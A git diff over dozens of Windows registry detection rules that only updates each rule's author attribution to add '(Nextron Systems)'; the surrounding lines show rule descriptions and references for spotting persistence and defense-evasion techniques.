diff --git a/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml b/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml
index 83d8ea3cd..0ecc73838 100644
--- a/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml
+++ b/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detect the creation of a service with a service binary located in a suspicious directory
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
-author: Florian Roth, frack113
+author: Florian Roth (Nextron Systems), frack113
 date: 2022/05/02
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml b/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml
index e51e48614..6f3a96e3a 100644
--- a/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml
+++ b/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detect the creation of a service with a service binary located in a uncommon directory
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/05/02
 modified: 2022/05/04
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml b/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml
index 313a32ba4..5475d1227 100644
--- a/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml
+++ b/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048
 references:
 - https://windows-internals.com/printdemon-cve-2020-1048/
-author: EagleEye Team, Florian Roth, NVISO
+author: EagleEye Team, Florian Roth (Nextron Systems), NVISO
 date: 2020/05/13
 modified: 2022/01/13
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml b/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml
index 21bd50330..24abf5a87 100644
--- a/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml
+++ b/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects the Setting of Windows Defender Exclusions
 references:
 - https://twitter.com/_nullbind/status/1204923340810543109
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/07/06
 modified: 2022/11/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml
index 002a4aa60..3d8812e8b 100644
--- a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml
+++ b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/MichalKoczwara/status/1553634816016498688
 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
 - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/01
 modified: 2023/01/18
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml b/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml
index 79c8a4842..b8165a4c9 100644
--- a/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml
+++ b/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml
@@ -3,7 +3,7 @@ id: ab871450-37dc-4a3a-997f-6662aa8ae0f1
 description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
 status: experimental
 date: 2022/10/25
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 references:
 - https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
 - https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope
diff --git a/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml b/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml
index d19be98cf..b49be144c 100644
--- a/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml
+++ b/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
 references:
 - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/04
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml b/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml
index e324577e5..f619d2542 100644
--- a/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml
+++ b/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml
@@ -11,7 +11,7 @@ description: |
 references:
 - https://persistence-info.github.io/Data/diskcleanuphandler.html
 - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 modified: 2022/10/21
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml b/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml
index 7e5832f45..bace1b315 100755
--- a/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml
+++ b/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)
 references:
 - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/05/08
 modified: 2022/11/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml b/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml
index 8d9b52fa7..2cbbf9990 100644
--- a/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml
+++ b/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
 references:
 - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/05
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml b/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml
index eacc10205..3479e8e7a 100644
--- a/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml
+++ b/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml
@@ -5,7 +5,7 @@ description: Detects when an attacker adds a new "Debugger" value to the "Hangs"
 references:
 - https://persistence-info.github.io/Data/wer_debugger.html
 - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 tags:
 - attack.persistence
diff --git a/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml b/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml
index fe4dba8a2..c87ea7cc4 100644
--- a/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml
+++ b/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml
@@ -5,7 +5,7 @@ description: Detects when an attacker modifies the registry value of the "hhctrl
 references:
 - https://persistence-info.github.io/Data/hhctrl.html
 - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 tags:
 - attack.persistence
diff --git a/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml b/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
index f6c8144fd..aec89dce7 100644
--- a/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
+++ b/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
@@ -11,7 +11,7 @@ description: |
 Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
 references:
 - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/26
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_mal_adwind.yml b/rules/windows/registry/registry_set/registry_set_mal_adwind.yml
index d98444493..8792fb280 100644
--- a/rules/windows/registry/registry_set/registry_set_mal_adwind.yml
+++ b/rules/windows/registry/registry_set/registry_set_mal_adwind.yml
@@ -8,7 +8,7 @@ description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
 references:
 - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
 - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
-author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
 date: 2017/11/10
 modified: 2022/11/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml
index ad7d6be77..0e30be43e 100644
--- a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml
+++ b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml
@@ -8,7 +8,7 @@ description: Detects when an attacker tries to add a new network provider in ord
 references:
 - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade
 - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/23
 modified: 2022/09/18
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml b/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml
index 0e5bfd80f..e1deeb06b 100644
--- a/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml
+++ b/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the manipulation of persistent URLs which could execute malicious code
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70
-author: Tobias Michalski
+author: Tobias Michalski (Nextron Systems)
 date: 2021/06/10
 modified: 2022/11/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml b/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml
index 7674417cc..281654ef9 100644
--- a/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml
+++ b/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml
@@ -5,7 +5,7 @@ description: Detects the manipulation of persistent URLs which can be malicious
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70
 - https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us
-author: Tobias Michalski
+author: Tobias Michalski (Nextron Systems)
 date: 2021/06/09
 modified: 2022/06/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml b/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml
index 1607d7cc3..8305bc0e6 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml
@@ -9,7 +9,7 @@ description: |
 references:
 - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/
 - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/10
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml b/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml
index c132dc546..5b0b0cbc3 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml
@@ -5,7 +5,7 @@ description: Detects change the the "AutodialDLL" key which could be used as a p
 references:
 - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/
 - https://persistence-info.github.io/Data/autodialdll.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/10
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_chm.yml b/rules/windows/registry/registry_set/registry_set_persistence_chm.yml
index e37f296f8..9d0977b13 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_chm.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_chm.yml
@@ -5,7 +5,7 @@ description: Detects when an attacker modifies the registry key "HtmlHelp Author
 references:
 - https://persistence-info.github.io/Data/htmlhelpauthor.html
 - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml
index ace55a99c..ed6f78356 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a supsicious or unsuale location
 references:
 - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/28
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml b/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml
index ef40e6145..4c4c5ac50 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
 references:
 - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/05/30
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml b/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml
index 3890a99a7..0b6f1fc11 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml
@@ -7,7 +7,7 @@ references:
 - https://twitter.com/0gtweet/status/1468548924600459267
 - https://github.com/gtworek/PSBits/tree/master/IFilter
 - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml b/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml
index db5e42845..d5d1faf95 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml
@@ -7,7 +7,7 @@ description: |
 references:
 - https://persistence-info.github.io/Data/lsaaextension.html
 - https://twitter.com/0gtweet/status/1476286368385019906
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml b/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml
index 0d0b27555..b49aaf24a 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml
@@ -5,7 +5,7 @@ description: Detects when an attacker register a new SIP provider for persistenc
 references:
 - https://persistence-info.github.io/Data/mpnotify.html
 - https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml b/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml
index 10d8d7779..576521f47 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
 references:
 - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/09
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml b/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml
index 2fbb33be4..2ecc3ed6e 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml
@@ -5,7 +5,7 @@ description: Detects when an attacker adds a new "DLLPathOverride" value to the
 references:
 - https://persistence-info.github.io/Data/naturallanguage6.html
 - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml b/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml
index 5695093bb..2408800e2 100644
--- a/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml
+++ b/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml
@@ -5,7 +5,7 @@ description: Detects modification addition to the 'TypedPaths' key in the user o
 references:
 - https://twitter.com/dez_/status/1560101453150257154
 - https://forensafe.com/blogs/typedpaths.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/22
 modified: 2023/01/11
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml b/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml
index 6ba317b79..99f787b6a 100644
--- a/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml
+++ b/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml
@@ -5,7 +5,7 @@ description: Detects tampering with attachment manager settings policies associa
 references:
 - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738
 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/01
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml b/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml
index a7f56419d..2d1e0b3d0 100644
--- a/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml
+++ b/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml
@@ -5,7 +5,7 @@ description: Detects tampering with attachment manager settings policies attachm
 references:
 - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738
 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/01
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml b/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml
index eb935678c..6cc9f40d4 100644
--- a/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml
+++ b/rules/windows/registry/registry_set/registry_set_powershell_execution_policy.yml
@@ -11,7 +11,7 @@ status: experimental
 description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
 references:
 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml b/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml
index 6563c590e..795d4fd11 100644
--- a/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml
+++ b/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml
@@ -9,7 +9,7 @@ status: experimental
 description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
 references:
 - Internal Research
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/24
 tags:
 - attack.resource_development
diff --git a/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml b/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml
index 3377d03c1..fa1599f21 100644
--- a/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml
+++ b/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
 references:
 - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/09
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml b/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml
index 073cddb27..ef1441165 100644
--- a/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml
+++ b/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
 references:
 - http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/09
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml
index 37986564d..266088492 100644
--- a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml
+++ b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml
@@ -6,7 +6,7 @@ references:
 - https://persistence-info.github.io/Data/codesigning.html
 - https://github.com/gtworek/PSBits/tree/master/SIP
 - https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/21
 modified: 2022/09/21
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml b/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml
index 94507a655..48fc4b899 100644
--- a/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml
+++ b/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects tamper attempts to sophos av functionality via registry key modification
 references:
 - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/02
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_special_accounts.yml b/rules/windows/registry/registry_set/registry_set_special_accounts.yml
index eea467063..e4ceacf62 100644
--- a/rules/windows/registry/registry_set/registry_set_special_accounts.yml
+++ b/rules/windows/registry/registry_set/registry_set_special_accounts.yml
@@ -8,7 +8,7 @@ description: Detects modifications to the registry key "HKLM\Software\Microsoft\
 references:
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md
-author: Nasreddine Bencherchali, frack113
+author: Nasreddine Bencherchali (Nextron Systems), frack113
 date: 2022/07/12
 modified: 2023/01/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml b/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml
index 276bafc8b..5f11872a2 100755
--- a/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml
+++ b/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml
@@ -5,7 +5,7 @@ description: Detects the keyboard preload installation with a suspicious keyboar
 references:
 - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index
 - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/12
 modified: 2022/03/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml
index 2860f1e97..36efc339f 100644
--- a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml
+++ b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a suspicious printer driver installation with an empty Manufacturer value
 references:
 - https://twitter.com/SBousseaden/status/1410545674773467140
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/01
 modified: 2022/09/21
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml b/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml
index 1c86770c1..c5782d849 100755
--- a/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml
+++ b/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
 references:
 - https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/
-author: Florian Roth, oscd.community
+author: Florian Roth (Nextron Systems), oscd.community
 date: 2018/07/18
 modified: 2022/03/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml
index 9cad28208..c43ac9eb2 100755
--- a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml
+++ b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
 references:
 - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
-author: Florian Roth, Markus Neis, Sander Wiebing
+author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
 date: 2018/08/25
 modified: 2022/09/13
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml b/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml
index 186a0e114..4882910e5 100644
--- a/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml
+++ b/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml
@@ -4,7 +4,7 @@ status: test
